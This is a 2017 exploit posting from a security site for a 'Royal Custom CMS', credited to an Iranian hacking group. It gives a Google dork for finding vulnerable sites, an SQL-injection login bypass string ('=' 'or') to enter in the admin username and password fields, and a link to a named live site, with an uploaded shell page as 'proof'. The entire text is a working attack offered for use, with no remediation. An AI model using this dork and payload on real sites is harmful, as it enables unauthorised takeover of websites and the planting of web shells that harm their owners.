Royal Custom CMS Admin Login Bypass upload sh3ll

Published
Credit
Risk
2017.07.03
iranonymous
Medium
CWE
CVE
Local
Remote
CWE-89
2017-07-02
No
Yes
Dork: " © 2011 Royal Custom Homes. All Rights Reserved. CCB: 158983"

======================================================
# Exploit Title: Royal Custom CMS Admin Login Bypass upload sh3ll
# Google Dork: " © 2011 Royal Custom Homes. All Rights Reserved. CCB: 158983"
# Date: 2017-07-01
# Author: iranonymous
# Tested on: Win 7, Linux
***************************************************
# Then Choose a Target and put this after URL :--> /admin/
# And fill username and password like the information below :
# Username: '=' 'or'
# Password: '=' 'or'
======================================================
# Demo :

http://www.royalcustomhomes.com/admin/

# Proof upload:

http://www.royalcustomhomes.com/up.php

=====================================================
# Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || ll_azab-siyah_ll || Dedicated Content ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||

# Iranian Anonymous

# Discovered By: Saman.Khan

References:

iranonymous


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com